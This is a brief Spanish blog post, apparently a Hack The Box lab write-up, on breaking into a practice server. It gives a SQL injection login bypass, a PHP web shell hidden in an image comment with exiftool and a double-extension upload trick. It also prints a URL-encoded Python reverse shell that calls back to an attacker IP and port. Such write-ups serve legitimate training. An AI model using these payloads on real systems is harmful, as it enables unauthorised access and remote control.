Hoy me toco un server de "Hackthebox" y me tope un login y subir una imagen y buscar el lugar donde manda mi imagen.
El login esta basado con un sql y vamos a romperlo con lo siguiente:
' or 1=1#
Hemos logrado acceder al login pero vamos nos encontramos con subir una imagen.
Si creamos una shell con una extensión jpg y usamos burpsuite para pasarlo en php nos muestra error porque solo permite una imagen... Ahora existe un método para comentar las imágenes y subirlas y comenzarlo a usar con la variable cmd.
' or 1=1#
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' 31502.jpg
mv normal.jpg normal.php.jpg
Buscamos la ruta donde manda nuestra imagen en nuestro caso seguí enumerándolo con gobuster.
Y el resultado para lograr acceder fue:
http://10.10.10.XXX/images/uploads/31502.php.jpg?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.75%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Logramos tener el control de nuestro sistema, gracias a "jpg?cmd=python3".Hasta logramos entender el código para subir un archivos.
0 Comentarios